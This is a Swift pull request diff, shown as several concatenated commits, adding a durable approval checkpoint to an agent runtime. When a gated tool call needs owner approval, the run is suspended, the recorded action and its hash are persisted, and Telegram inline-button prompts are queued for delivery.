### PR TITLE
Suspend runs to a durable approval checkpoint

### DIFF
--- a/Sources/ClawAgent/Runtime/AgentRuntime.swift
+++ b/Sources/ClawAgent/Runtime/AgentRuntime.swift
@@ -11,6 +11,19 @@ public enum DegradationKind: String, Sendable, Equatable {
   case accountingFailed  // NEW (§6 — usage-write failure mid-run)
 }
 
+/// The ask-tier proposal that parked a run (§5.2): the `tool_call_id` its placeholder observation
+/// answers, plus the recorded canonical action the approval binds to and the waiter later replays
+/// (§6.3). `RecordedToolAction` is Equatable, so `TurnResult.suspended` stays Equatable.
+public struct PendingToolAction: Sendable, Equatable {
+  public let toolCallId: String
+  public let recorded: RecordedToolAction
+
+  public init(toolCallId: String, recorded: RecordedToolAction) {
+    self.toolCallId = toolCallId
+    self.recorded = recorded
+  }
+}
+
 /// The outcome of one orchestrated turn. `runTurn` never throws — every failure becomes one of
 /// these so the gateway always has something to persist and send (never silence).
 public enum TurnResult: Sendable, Equatable {
@@ -21,6 +34,10 @@ public enum TurnResult: Sendable, Equatable {
   case degraded(DegradationKind, usage: ProviderUsage?)
   /// The offline budget gate refused before any provider call; `cap` names the tripped limit.
   case budgetStopped(cap: String)
+  /// The batch drained after an ask-tier proposal recorded its action (§5.2); the gateway commits
+  /// the durable suspend checkpoint. `usage` is the suspending round-trip's reconciled row — it was
+  /// already recorded mid-loop, so the suspend commit (Task 14) must NOT re-debit it.
+  case suspended(pending: PendingToolAction, usage: ProviderUsage)
 }
 
 /// The outcome of the bounded agentic loop (§6): the terminal `TurnResult` plus everything the
@@ -31,6 +48,11 @@ public struct TurnOutcome: Sendable {
   public let exchanges: [ToolExchange]
   /// Taint signal: any executed observation ingested untrusted content this run (§10).
   public let ingestedUntrusted: Bool
+  /// Private-data signal (§4.5): the assembly flag (fitted USER/MEMORY sections) OR any executed
+  /// observation that read private data this run — `assemblyPrivateData ∪ runPrivateData`. Every
+  /// commit path persists it as `setPrivateData`; the suspend commit (Task 14) is its first
+  /// consumer, the rest of the §4.5 lifecycle lands in Task 23 (D6).
+  public let hadPrivateData: Bool
   /// A gate trip awaiting the owner's approval, if this run tripped one (§9).
   public let pendingApproval: ToolApprovalRequest?
 
@@ -38,11 +60,13 @@ public struct TurnOutcome: Sendable {
     result: TurnResult,
     exchanges: [ToolExchange] = [],
     ingestedUntrusted: Bool = false,
+    hadPrivateData: Bool = false,
     pendingApproval: ToolApprovalRequest? = nil
   ) {
     self.result = result
     self.exchanges = exchanges
     self.ingestedUntrusted = ingestedUntrusted
+    self.hadPrivateData = hadPrivateData
     self.pendingApproval = pendingApproval
   }
 }
@@ -138,6 +162,7 @@ public struct AgentRuntime: Sendable {
     var runPrivateData = false
 
     var pendingApproval: ToolApprovalRequest?
+    var pendingSuspension: PendingToolAction?
     var remainingGrant = grant
 
     var proposedToolCalls = 0
@@ -153,6 +178,7 @@ public struct AgentRuntime: Sendable {
         result: result,
         exchanges: exchanges,
         ingestedUntrusted: ingestedUntrusted,
+        hadPrivateData: buildResult.hasPrivateDataAccess || runPrivateData,
         pendingApproval: pendingApproval
       )
     }
@@ -295,7 +321,7 @@ public struct AgentRuntime: Sendable {
           assemblyPrivateData: buildResult.hasPrivateDataAccess,
           runPrivateData: runPrivateData,
           grant: remainingGrant,
-          approvalAlreadyPending: pendingApproval != nil,
+          approvalAlreadyPending: pendingApproval != nil || pendingSuspension != nil,
           nonInteractive: origin != .interactive
         )
 
@@ -318,6 +344,18 @@ public struct AgentRuntime: Sendable {
         turnLog.debug(
           "tool \(call.name) done decision=\(dispatched.observation.status.rawValue) bytes=\(dispatched.observation.content.utf8.count) ms=\(Self.millis(ContinuousClock.now - toolStart))"
         )
+
+        // §5.2 durable suspend: the FIRST ask-tier proposal records its action and parks the run.
+        // The tool did NOT execute — its placeholder observation row and the approvalRequested
+        // audit both ride the suspend commit (§5.3 / Task 14), so skip both the toolCall audit and
+        // the observation append here. Later gated calls in the batch see approvalAlreadyPending
+        // (Step 5) and return a blocked observation instead (requiresApproval nil), which appends
+        // normally below.
+        if pendingSuspension == nil, let recordedAction = dispatched.requiresApproval {
+          pendingSuspension = PendingToolAction(toolCallId: call.id, recorded: recordedAction)
+          continue
+        }
+
         try recordToolAudit(for: call, outcome: dispatched, runId: runId, sessionId: sessionId)
 
         observations.append(dispatched.observation)
@@ -359,6 +397,14 @@ public struct AgentRuntime: Sendable {
           observations: observations
         )
       )
+
+      // §5.2: the batch has drained. If an ask-tier proposal parked, return the suspend result now.
+      // `intermediate` is THIS round-trip's already-recorded usage (recorded above via
+      // `usageStore.recordUsage`); the exchange above carries the assistant anchor + completed
+      // observations, and the parked call's placeholder is reserved at the suspend commit.
+      if let pending = pendingSuspension {
+        return outcome(.suspended(pending: pending, usage: intermediate))
+      }
     }
 
     return outcome(.budgetStopped(cap: "per-run turn"))
@@ -399,6 +445,10 @@ private extension AgentRuntime {
       )
     case .budgetStopped(let cap):
       log.notice("turn finished budget-stopped cap=\(cap) ms=\(elapsedMillis)")
+    case .suspended(let pending, let usage):
+      log.info(
+        "turn finished suspended tool=\(pending.recorded.tool) tokens=\(usage.promptTokens + usage.completionTokens) ms=\(elapsedMillis)"
+      )
     }
   }
 

--- a/Sources/ClawAgent/Runtime/AgentRuntime.swift
+++ b/Sources/ClawAgent/Runtime/AgentRuntime.swift
@@ -11,19 +11,6 @@ public enum DegradationKind: String, Sendable, Equatable {
   case accountingFailed  // NEW (§6 — usage-write failure mid-run)
 }
 
-/// The ask-tier proposal that parked a run (§5.2): the `tool_call_id` its placeholder observation
-/// answers, plus the recorded canonical action the approval binds to and the waiter later replays
-/// (§6.3). `RecordedToolAction` is Equatable, so `TurnResult.suspended` stays Equatable.
-public struct PendingToolAction: Sendable, Equatable {
-  public let toolCallId: String
-  public let recorded: RecordedToolAction
-
-  public init(toolCallId: String, recorded: RecordedToolAction) {
-    self.toolCallId = toolCallId
-    self.recorded = recorded
-  }
-}
-
 /// The outcome of one orchestrated turn. `runTurn` never throws — every failure becomes one of
 /// these so the gateway always has something to persist and send (never silence).
 public enum TurnResult: Sendable, Equatable {

--- a/Sources/ClawCore/Domain/Tools/ToolApproval.swift
+++ b/Sources/ClawCore/Domain/Tools/ToolApproval.swift
@@ -45,3 +45,50 @@ public struct OneTurnGrant: Sendable, Equatable {
     self.action = action
   }
 }
+
+/// The §5.4 tool-specific prompt inputs, produced at gate time by the tool that will act. The gate
+/// records them so the durable prompt (Task 13) never re-derives blast radius from a stale or
+/// unparsed argument form.
+public struct ToolApprovalPresentation: Sendable, Equatable {
+  /// e.g. "create, 1.2 KB" / "overwrite, 340 B" / "egress to <host>".
+  public let blastRadius: String
+  /// Size-capped, secret-redacted; nil for non-write tools.
+  public let contentPreview: String?
+  /// `memory_write` scan warnings; empty otherwise.
+  public let warnings: [String]
+
+  public init(blastRadius: String, contentPreview: String?, warnings: [String]) {
+    self.blastRadius = blastRadius
+    self.contentPreview = contentPreview
+    self.warnings = warnings
+  }
+}
+
+/// Everything the §5.3 suspend commit records and the approval binds to. The recorded canonical
+/// args are what execute at resume time (§6.3) — never a fresh model turn.
+public struct RecordedToolAction: Sendable, Equatable {
+  public let tool: String
+  /// Canonical (sorted-keys) JSON of the call arguments.
+  public let canonicalArgsJSON: String
+  /// SHA-256 hex of `canonicalArgsJSON`; the approve CAS recomputes and compares it (§6.2 step 5).
+  public let argsHash: String
+  public let canonicalTarget: String
+  public let reason: ApprovalReason
+  public let presentation: ToolApprovalPresentation
+
+  public init(
+    tool: String,
+    canonicalArgsJSON: String,
+    argsHash: String,
+    canonicalTarget: String,
+    reason: ApprovalReason,
+    presentation: ToolApprovalPresentation
+  ) {
+    self.tool = tool
+    self.canonicalArgsJSON = canonicalArgsJSON
+    self.argsHash = argsHash
+    self.canonicalTarget = canonicalTarget
+    self.reason = reason
+    self.presentation = presentation
+  }
+}

--- a/Sources/ClawCore/Domain/Tools/ToolApproval.swift
+++ b/Sources/ClawCore/Domain/Tools/ToolApproval.swift
@@ -92,3 +92,18 @@ public struct RecordedToolAction: Sendable, Equatable {
     self.presentation = presentation
   }
 }
+
+/// The ask-tier proposal that parked a run (§5.2): the `tool_call_id` its placeholder observation
+/// answers, plus the recorded canonical action the approval binds to and the waiter later replays
+/// (§6.3). `RecordedToolAction` is Equatable, so `TurnResult.suspended` stays Equatable. Lives in
+/// ClawCore so the §5.3 suspend commit (`RunStore`) and its GRDB store can bind to it without a
+/// dependency on ClawAgent.
+public struct PendingToolAction: Sendable, Equatable {
+  public let toolCallId: String
+  public let recorded: RecordedToolAction
+
+  public init(toolCallId: String, recorded: RecordedToolAction) {
+    self.toolCallId = toolCallId
+    self.recorded = recorded
+  }
+}

--- a/Sources/ClawCore/Domain/Tools/ToolContracts.swift
+++ b/Sources/ClawCore/Domain/Tools/ToolContracts.swift
@@ -267,8 +267,10 @@ public protocol Tool: Sendable {
   /// The §5.4 prompt inputs for an ask-tier or trifecta approval, produced at gate time on the
   /// gate-resolved `canonicalTarget`. The default is a generic egress presentation; write tools
   /// override with blast radius, a redacted preview, and any scan warnings.
-  func approvalPresentation(arguments: JSONValue, canonicalTarget: String)
-    -> ToolApprovalPresentation
+  func approvalPresentation(
+    arguments: JSONValue,
+    canonicalTarget: String
+  ) -> ToolApprovalPresentation
 }
 
 extension Tool {

--- a/Sources/ClawCore/Domain/Tools/ToolContracts.swift
+++ b/Sources/ClawCore/Domain/Tools/ToolContracts.swift
@@ -263,6 +263,25 @@ public protocol Tool: Sendable {
   /// `canonicalTarget` is the gate-resolved form for `.arbitraryDestination` tools — act on
   /// exactly what was authorized, never re-derive it; `nil` for the other classes.
   func execute(arguments: JSONValue, canonicalTarget: String?) async -> ToolPayload
+
+  /// The §5.4 prompt inputs for an ask-tier or trifecta approval, produced at gate time on the
+  /// gate-resolved `canonicalTarget`. The default is a generic egress presentation; write tools
+  /// override with blast radius, a redacted preview, and any scan warnings.
+  func approvalPresentation(arguments: JSONValue, canonicalTarget: String)
+    -> ToolApprovalPresentation
+}
+
+extension Tool {
+  public func approvalPresentation(
+    arguments: JSONValue,
+    canonicalTarget: String
+  ) -> ToolApprovalPresentation {
+    ToolApprovalPresentation(
+      blastRadius: "egress to \(canonicalTarget)",
+      contentPreview: nil,
+      warnings: []
+    )
+  }
 }
 
 /// The search seam (D2). One v1 impl: ExaSearchProvider (§7.4, research-settled).

--- a/Sources/ClawCore/Domain/Tools/ToolDispatching.swift
+++ b/Sources/ClawCore/Domain/Tools/ToolDispatching.swift
@@ -40,8 +40,6 @@ public struct ToolDispatchOutcome: Sendable, Equatable {
   public let observation: ToolObservation
   public let argsRedacted: String
   public let pendingApproval: ToolApprovalRequest?
-  /// The recorded ask-tier/trifecta action to suspend on (§5.2). Rides alongside `pendingApproval`
-  /// until Task 24 retires the ephemeral flow.
   public let requiresApproval: RecordedToolAction?
   public let consumedGrant: Bool
 

--- a/Sources/ClawCore/Domain/Tools/ToolDispatching.swift
+++ b/Sources/ClawCore/Domain/Tools/ToolDispatching.swift
@@ -40,17 +40,22 @@ public struct ToolDispatchOutcome: Sendable, Equatable {
   public let observation: ToolObservation
   public let argsRedacted: String
   public let pendingApproval: ToolApprovalRequest?
+  /// The recorded ask-tier/trifecta action to suspend on (§5.2). Rides alongside `pendingApproval`
+  /// until Task 24 retires the ephemeral flow.
+  public let requiresApproval: RecordedToolAction?
   public let consumedGrant: Bool
 
   public init(
     observation: ToolObservation,
     argsRedacted: String,
     pendingApproval: ToolApprovalRequest? = nil,
+    requiresApproval: RecordedToolAction? = nil,
     consumedGrant: Bool = false
   ) {
     self.observation = observation
     self.argsRedacted = argsRedacted
     self.pendingApproval = pendingApproval
+    self.requiresApproval = requiresApproval
     self.consumedGrant = consumedGrant
   }
 }

--- a/Sources/ClawCore/Persistence/Persistence.swift
+++ b/Sources/ClawCore/Persistence/Persistence.swift
@@ -236,12 +236,23 @@ public struct OutboxChunk: Sendable, Equatable {
   public let chatId: Int64
   public let payload: String
   public let payloadHash: String
+  public let approvalId: Int64?
+  public let replyMarkup: String?
 
-  public init(stepIndex: Int, chatId: Int64, payload: String, payloadHash: String) {
+  public init(
+    stepIndex: Int,
+    chatId: Int64,
+    payload: String,
+    payloadHash: String,
+    approvalId: Int64? = nil,
+    replyMarkup: String? = nil
+  ) {
     self.stepIndex = stepIndex
     self.chatId = chatId
     self.payload = payload
     self.payloadHash = payloadHash
+    self.approvalId = approvalId
+    self.replyMarkup = replyMarkup
   }
 }
 
@@ -250,12 +261,23 @@ public struct OutboxRow: Sendable, Equatable {
   public let stepIndex: Int
   public let chatId: Int64
   public let payload: String
+  public let approvalId: Int64?
+  public let replyMarkup: String?
 
-  public init(runId: Int64, stepIndex: Int, chatId: Int64, payload: String) {
+  public init(
+    runId: Int64,
+    stepIndex: Int,
+    chatId: Int64,
+    payload: String,
+    approvalId: Int64? = nil,
+    replyMarkup: String? = nil
+  ) {
     self.runId = runId
     self.stepIndex = stepIndex
     self.chatId = chatId
     self.payload = payload
+    self.approvalId = approvalId
+    self.replyMarkup = replyMarkup
   }
 }
 

--- a/Sources/ClawCore/Persistence/Stores.swift
+++ b/Sources/ClawCore/Persistence/Stores.swift
@@ -136,6 +136,74 @@ public protocol SessionMessageStore: Sendable {
   func resetWindowAndDetaint(sessionId: Int64, now: Date) throws
 }
 
+/// One already-executed observation of the suspending batch, in the order it ran (spec §5.3).
+public struct ToolObservationRow: Sendable, Equatable {
+  public let toolCallId: String
+  public let content: String
+
+  public init(toolCallId: String, content: String) {
+    self.toolCallId = toolCallId
+    self.content = content
+  }
+}
+
+/// Everything the §5.3 suspend commit persists in ONE transaction. Mirrors `AssistantTurn`, plus
+/// the pending action the approval binds to and the button-carrying outbox chunk(s). `promptChunks`
+/// carry `replyMarkup` already; the store stamps `approvalId` on the button chunk after inserting
+/// the `approvals` row (the id is unknown until then).
+public struct SuspendedTurnCommit: Sendable {
+  public let assistantContent: String
+  public let toolCallsJSON: String
+  public let completedObservations: [ToolObservationRow]
+  public let pending: PendingToolAction
+  public let ownerUserId: Int64  // the run's delivery chat id (§4.4)
+  public let nonce: String  // caller-generated via ApprovalNonce.generate()
+  public let promptChunks: [OutboxChunk]
+  public let setTainted: Bool
+  public let setPrivateData: Bool
+  public let expiresTs: Date  // now + approval_expiry
+  // NOTE: no `usage` field. The suspending round-trip's `provider_usage` row is already written
+  // mid-loop by `AgentRuntime` before dispatch (crash-safe); re-inserting it here would double the
+  // day budget AND the §6.3 resume carry-over, since `provider_usage` has no dedup key and both
+  // totals SUM every row. The commit persists the checkpoint only, never usage.
+
+  public init(
+    assistantContent: String,
+    toolCallsJSON: String,
+    completedObservations: [ToolObservationRow],
+    pending: PendingToolAction,
+    ownerUserId: Int64,
+    nonce: String,
+    promptChunks: [OutboxChunk],
+    setTainted: Bool,
+    setPrivateData: Bool,
+    expiresTs: Date
+  ) {
+    self.assistantContent = assistantContent
+    self.toolCallsJSON = toolCallsJSON
+    self.completedObservations = completedObservations
+    self.pending = pending
+    self.ownerUserId = ownerUserId
+    self.nonce = nonce
+    self.promptChunks = promptChunks
+    self.setTainted = setTainted
+    self.setPrivateData = setPrivateData
+    self.expiresTs = expiresTs
+  }
+}
+
+/// The suspend commit's outputs the waiter and boot re-park need: the new approval id and the
+/// placeholder observation row's message id (§6.3 continuation bound).
+public struct SuspendedCommitReceipt: Sendable, Equatable {
+  public let approvalId: Int64
+  public let observationMessageId: Int64
+
+  public init(approvalId: Int64, observationMessageId: Int64) {
+    self.approvalId = approvalId
+    self.observationMessageId = observationMessageId
+  }
+}
+
 public protocol RunStore: Sendable {
   /// PENDING → RUNNING through `RunFSM`, returning the run's origin in the same write; nil means
   /// the run is absent or no longer pending — the guard semantics are unchanged (spec §10,
@@ -167,6 +235,18 @@ public protocol RunStore: Sendable {
   /// Snapshot of run-table health: in-flight count, age of oldest running run, last
   /// success/failure timestamps, and count of consecutive failures at the head of the table.
   func runsHealth(now: Date) throws -> RunsHealth
+  /// §5.3 suspend checkpoint — ONE txn (mirrors `commitAssistantTurn`): the anchor assistant row
+  /// (content + tool_calls JSON), every completed observation, a real PLACEHOLDER observation row
+  /// (role tool, the pending toolCallId, content "awaiting owner approval") to pin rowid adjacency,
+  /// the `approvals` row (policy_version copied from the run row in-txn), `RUNNING→AWAITING_APPROVAL`,
+  /// `setTainted`/`setPrivateData`, the `approvalRequested` audit, and the approval-prompt outbox
+  /// chunk(s). Commit, then send.
+  func commitSuspendedTurn(
+    runId: Int64,
+    sessionId: Int64,
+    commit: SuspendedTurnCommit,
+    now: Date
+  ) throws -> SuspendedCommitReceipt
 }
 
 public extension RunStore {

--- a/Sources/ClawCore/Persistence/Stores.swift
+++ b/Sources/ClawCore/Persistence/Stores.swift
@@ -229,7 +229,9 @@ public protocol OutboxStore: Sendable {
     stepIndex: Int,
     chatId: Int64,
     payload: String,
-    payloadHash: String
+    payloadHash: String,
+    approvalId: Int64?,
+    replyMarkup: String?
   ) throws -> Bool
   /// Claims a reply only while the owning run is still active (RUNNING or AWAITING_APPROVAL —
   /// a suspended run's own approval prompt must be deliverable, preamble D7).
@@ -238,7 +240,9 @@ public protocol OutboxStore: Sendable {
     stepIndex: Int,
     chatId: Int64,
     payload: String,
-    payloadHash: String
+    payloadHash: String,
+    approvalId: Int64?,
+    replyMarkup: String?
   ) throws -> Bool
   func markSent(runId: Int64, stepIndex: Int, telegramMessageId: Int64, now: Date) throws
   func pendingOutbound() throws -> [OutboxRow]

--- a/Sources/ClawCore/Transport/TelegramTransport.swift
+++ b/Sources/ClawCore/Transport/TelegramTransport.swift
@@ -20,12 +20,27 @@ public protocol MessageDelivery: Sendable {
   /// Returns the assigned `message_id` like `sendMessage`. On any rich-send error the dispatcher
   /// re-sends the chunk as plain `sendMessage` (F8), so this never has to succeed for a reply to land.
   func sendRichMessage(chatId: Int64, markdown: String) async throws -> Int64
+  /// As `sendMessage`, but attaches an inline keyboard when `replyMarkup` is a Telegram
+  /// `reply_markup` JSON string (nil = no keyboard). The approval prompt's buttons ride this.
+  func sendMessage(chatId: Int64, text: String, replyMarkup: String?) async throws -> Int64
+  /// As `sendRichMessage`, but attaches the same optional inline keyboard.
+  func sendRichMessage(chatId: Int64, markdown: String, replyMarkup: String?) async throws -> Int64
+}
+
+/// Answers and disarms inline-button callbacks. A separate port so the callback handler can hold a
+/// `any CallbackResponding` without the full Telegram composite (spec §6.1).
+public protocol CallbackResponding: Sendable {
+  /// Called on EVERY callback, valid or not, to stop the client's button spinner. `text` is the
+  /// optional neutral toast; a nil/empty toast is the fail-closed default (§6.2).
+  func answerCallbackQuery(id: String, text: String?) async throws
+  /// Disarms the prompt's buttons on resolve; `replyMarkup` nil removes the keyboard entirely.
+  func editMessageReplyMarkup(chatId: Int64, messageId: Int64, replyMarkup: String?) async throws
 }
 
 /// The full Telegram surface: intake + delivery plus the Telegram-specific extras (identity,
 /// streaming drafts, chat actions, the command menu) that only `clawd` and the `ClawTelegram`
 /// wrappers consume.
-public protocol TelegramTransport: ChannelIntake, MessageDelivery {
+public protocol TelegramTransport: ChannelIntake, MessageDelivery, CallbackResponding {
   func getMe() async throws -> BotIdentity
   func sendRichMessageDraft(chatId: Int64, draftId: Int64, markdown: String) async throws -> Bool
   /// Emits a Telegram chat action (e.g. `"typing"`). Fire-and-forget: the action auto-expires (~5s),
@@ -45,6 +60,38 @@ extension TelegramTransport {
   }
 
   public func setMyCommands(_ commands: [BotMenuCommand]) async throws {}
+
+  public func answerCallbackQuery(id: String, text: String?) async throws {
+    throw TelegramError.transport("answerCallbackQuery not implemented")
+  }
+
+  public func editMessageReplyMarkup(
+    chatId: Int64,
+    messageId: Int64,
+    replyMarkup: String?
+  ) async throws {
+    throw TelegramError.transport("editMessageReplyMarkup not implemented")
+  }
+}
+
+extension MessageDelivery {
+  public func sendMessage(chatId: Int64, text: String, replyMarkup: String?) async throws -> Int64 {
+    guard replyMarkup == nil else {
+      throw TelegramError.transport("sendMessage(replyMarkup:) not implemented")
+    }
+    return try await sendMessage(chatId: chatId, text: text)
+  }
+
+  public func sendRichMessage(
+    chatId: Int64,
+    markdown: String,
+    replyMarkup: String?
+  ) async throws -> Int64 {
+    guard replyMarkup == nil else {
+      throw TelegramError.transport("sendRichMessage(replyMarkup:) not implemented")
+    }
+    return try await sendRichMessage(chatId: chatId, markdown: markdown)
+  }
 }
 
 public protocol RichDraftStreaming: Sendable {

--- a/Sources/ClawData/Stores/Delivery/OutboxDedupKey.swift
+++ b/Sources/ClawData/Stores/Delivery/OutboxDedupKey.swift
@@ -1,0 +1,7 @@
+import Foundation
+
+enum OutboxDedupKey {
+  static func make(runId: Int64, stepIndex: Int) -> String {
+    "\(runId):\(stepIndex)"
+  }
+}

--- a/Sources/ClawData/Stores/Delivery/OutboxStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Delivery/OutboxStoreGRDB.swift
@@ -60,7 +60,7 @@ public struct OutboxStoreGRDB: OutboxStore {
           runId,
           stepIndex,
           chatId,
-          "\(runId):\(stepIndex)",
+          OutboxDedupKey.make(runId: runId, stepIndex: stepIndex),
           payload,
           payloadHash,
           approvalId,
@@ -77,7 +77,7 @@ public struct OutboxStoreGRDB: OutboxStore {
 
   public func markSent(runId: Int64, stepIndex: Int, telegramMessageId: Int64, now: Date) throws {
     try database.writeMapping { db in
-      let dedupKey = "\(runId):\(stepIndex)"
+      let dedupKey = OutboxDedupKey.make(runId: runId, stepIndex: stepIndex)
       try db.execute(
         sql: """
           UPDATE outbound_deliveries SET status = 'SENT', telegram_message_id = ?, sent_ts = ?

--- a/Sources/ClawData/Stores/Delivery/OutboxStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Delivery/OutboxStoreGRDB.swift
@@ -14,7 +14,9 @@ public struct OutboxStoreGRDB: OutboxStore {
     stepIndex: Int,
     chatId: Int64,
     payload: String,
-    payloadHash: String
+    payloadHash: String,
+    approvalId: Int64? = nil,
+    replyMarkup: String? = nil
   ) throws -> Bool {
     try database.writeMapping { db in
       try RunStoreGRDB.insertOutbox(
@@ -24,7 +26,9 @@ public struct OutboxStoreGRDB: OutboxStore {
           stepIndex: stepIndex,
           chatId: chatId,
           payload: payload,
-          payloadHash: payloadHash
+          payloadHash: payloadHash,
+          approvalId: approvalId,
+          replyMarkup: replyMarkup
         ),
         now: Date()
       )
@@ -36,15 +40,18 @@ public struct OutboxStoreGRDB: OutboxStore {
     stepIndex: Int,
     chatId: Int64,
     payload: String,
-    payloadHash: String
+    payloadHash: String,
+    approvalId: Int64? = nil,
+    replyMarkup: String? = nil
   ) throws -> Bool {
     try database.writeMapping { db in
       try db.execute(
         sql: """
           INSERT OR IGNORE INTO outbound_deliveries(
-            run_id, step_index, chat_id, dedup_key, payload, payload_hash, status, created_ts
+            run_id, step_index, chat_id, dedup_key, payload, payload_hash,
+            approval_id, reply_markup, status, created_ts
           )
-          SELECT ?, ?, ?, ?, ?, ?, 'PENDING', ?
+          SELECT ?, ?, ?, ?, ?, ?, ?, ?, 'PENDING', ?
           WHERE EXISTS (
             SELECT 1 FROM runs WHERE id = ? AND state IN (?, ?)
           )
@@ -56,6 +63,8 @@ public struct OutboxStoreGRDB: OutboxStore {
           "\(runId):\(stepIndex)",
           payload,
           payloadHash,
+          approvalId,
+          replyMarkup,
           Date(),
           runId,
           RunState.running.rawValue,
@@ -68,12 +77,23 @@ public struct OutboxStoreGRDB: OutboxStore {
 
   public func markSent(runId: Int64, stepIndex: Int, telegramMessageId: Int64, now: Date) throws {
     try database.writeMapping { db in
+      let dedupKey = "\(runId):\(stepIndex)"
       try db.execute(
         sql: """
           UPDATE outbound_deliveries SET status = 'SENT', telegram_message_id = ?, sent_ts = ?
           WHERE dedup_key = ?
           """,
-        arguments: [telegramMessageId, now, "\(runId):\(stepIndex)"]
+        arguments: [telegramMessageId, now, dedupKey]
+      )
+      // §4.1: an approval-prompt delivery links its Telegram message to the approval so the
+      // buttons can later be disarmed. The write rides THIS transaction; a NULL approval_id makes
+      // the subquery yield NULL, so `id = NULL` matches nothing and plain rows stay untouched.
+      try db.execute(
+        sql: """
+          UPDATE approvals SET prompt_message_id = ?
+          WHERE id = (SELECT approval_id FROM outbound_deliveries WHERE dedup_key = ?)
+          """,
+        arguments: [telegramMessageId, dedupKey]
       )
     }
   }
@@ -83,7 +103,8 @@ public struct OutboxStoreGRDB: OutboxStore {
       try Row.fetchAll(
         db,
         sql: """
-          SELECT run_id, step_index, chat_id, payload FROM outbound_deliveries
+          SELECT run_id, step_index, chat_id, payload, approval_id, reply_markup
+          FROM outbound_deliveries
           WHERE status = 'PENDING' ORDER BY run_id, step_index
           """
       ).map { row in
@@ -91,7 +112,9 @@ public struct OutboxStoreGRDB: OutboxStore {
           runId: row["run_id"],
           stepIndex: row["step_index"],
           chatId: row["chat_id"],
-          payload: row["payload"]
+          payload: row["payload"],
+          approvalId: row["approval_id"],
+          replyMarkup: row["reply_markup"]
         )
       }
     }

--- a/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
+++ b/Sources/ClawData/Stores/Run/RunStoreGRDB.swift
@@ -4,9 +4,21 @@ import GRDB
 
 public struct RunStoreGRDB: RunStore {
   private let database: MappedDatabase
+  /// Injected fault hook for the §5.3 atomicity test only: thrown inside the suspend-commit txn so
+  /// a scripted mid-write failure proves the whole checkpoint rolls back. The public init passes a
+  /// no-op (mirrors `MemoryCommandStoreGRDB.afterClaimForTesting`).
+  private let suspendCommitFault: @Sendable () throws -> Void
 
   public init(writer: any DatabaseWriter) {
+    self.init(writer: writer, suspendCommitFault: {})
+  }
+
+  init(
+    writer: any DatabaseWriter,
+    suspendCommitFault: @escaping @Sendable () throws -> Void
+  ) {
     database = MappedDatabase(writer: writer)
+    self.suspendCommitFault = suspendCommitFault
   }
 
   public func pickUp(runId: Int64, policyVersion: String?, now: Date) throws -> RunOrigin? {
@@ -207,6 +219,124 @@ public struct RunStoreGRDB: RunStore {
         return
       }
       try Self.appendJobFailedIfJobRun(db, runId: runId, now: now)
+    }
+  }
+
+  public func commitSuspendedTurn(
+    runId: Int64,
+    sessionId: Int64,
+    commit: SuspendedTurnCommit,
+    now: Date
+  ) throws -> SuspendedCommitReceipt {
+    try database.writeMapping { db in
+      // Lost arbitration (a racing /stop//new already terminated the run) rolls back with no
+      // orphan approval — the FSM refuses RUNNING→AWAITING from any non-running state.
+      guard try Self.transitionRun(db, runId: runId, event: .suspendForApproval, now: now) != nil
+      else {
+        throw StoreError.unexpected("run \(runId) was not RUNNING at suspend commit")
+      }
+
+      try db.execute(
+        sql: """
+          INSERT INTO messages(session_id, run_id, role, content, provenance, ts, tool_calls)
+          VALUES (?, ?, 'assistant', ?, 'trusted', ?, ?)
+          """,
+        arguments: [sessionId, runId, commit.assistantContent, now, commit.toolCallsJSON]
+      )
+      for observation in commit.completedObservations {
+        try db.execute(
+          sql: """
+            INSERT INTO messages(session_id, run_id, role, content, provenance, ts, tool_call_id)
+            VALUES (?, ?, 'tool', ?, 'untrusted', ?, ?)
+            """,
+          arguments: [sessionId, runId, observation.content, now, observation.toolCallId]
+        )
+      }
+      // The PLACEHOLDER pins rowid adjacency: a real `tool` row satisfying the anchor's expected
+      // tool_call_id so `HistoryHygiene` keeps the exchange while parked (§5.3). Resolution UPDATEs
+      // it in place (v4 FTS triggers cover the edit).
+      try db.execute(
+        sql: """
+          INSERT INTO messages(session_id, run_id, role, content, provenance, ts, tool_call_id)
+          VALUES (?, ?, 'tool', ?, 'untrusted', ?, ?)
+          """,
+        arguments: [
+          sessionId, runId, Self.placeholderObservationContent, now, commit.pending.toolCallId,
+        ]
+      )
+      let observationMessageId = db.lastInsertedRowID
+
+      // policy_version copied from the run row IN-txn (§3.2); empty when unstamped.
+      let policyVersion =
+        try String.fetchOne(
+          db,
+          sql: "SELECT policy_version FROM runs WHERE id = ?",
+          arguments: [runId]
+        ) ?? ""
+
+      let recorded = commit.pending.recorded
+      let approvalId = try ApprovalStoreGRDB.insertApproval(
+        db,
+        NewApproval(
+          runId: runId,
+          sessionId: sessionId,
+          tool: recorded.tool,
+          canonicalArgsJSON: recorded.canonicalArgsJSON,
+          canonicalTarget: recorded.canonicalTarget,
+          argsHash: recorded.argsHash,
+          policyVersion: policyVersion,
+          ownerUserId: commit.ownerUserId,
+          nonce: commit.nonce,
+          observationMessageId: observationMessageId,
+          toolCallId: commit.pending.toolCallId,
+          reason: recorded.reason,
+          createdTs: now,
+          expiresTs: commit.expiresTs
+        )
+      )
+
+      if commit.setTainted {
+        try Self.setSessionTainted(db, sessionId: sessionId, now: now)
+      }
+      if commit.setPrivateData {
+        try Self.setSessionPrivateData(db, sessionId: sessionId, now: now)
+      }
+
+      // No usage insert here — the suspending round's `provider_usage` row was already written
+      // mid-loop by `AgentRuntime`; re-inserting would double-debit the budget and resume carry-over.
+
+      // Stamp the new approval id onto the button-carrying chunk so `markSent` can link
+      // `prompt_message_id` (Task 10); explanation chunks keep their nil approval_id.
+      for chunk in commit.promptChunks {
+        let linked = OutboxChunk(
+          stepIndex: chunk.stepIndex,
+          chatId: chunk.chatId,
+          payload: chunk.payload,
+          payloadHash: chunk.payloadHash,
+          approvalId: chunk.replyMarkup != nil ? approvalId : chunk.approvalId,
+          replyMarkup: chunk.replyMarkup
+        )
+        _ = try Self.insertOutbox(db, runId: runId, chunk: linked, now: now)
+      }
+
+      try AuditLogGRDB.insertAudit(
+        db,
+        AuditEvent(
+          actor: .assistant,
+          action: .approvalRequested,
+          tool: recorded.tool,
+          decision: recorded.reason.rawValue,
+          runId: runId,
+          sessionId: sessionId,
+          ts: now
+        )
+      )
+
+      try suspendCommitFault()
+      return SuspendedCommitReceipt(
+        approvalId: approvalId,
+        observationMessageId: observationMessageId
+      )
     }
   }
 
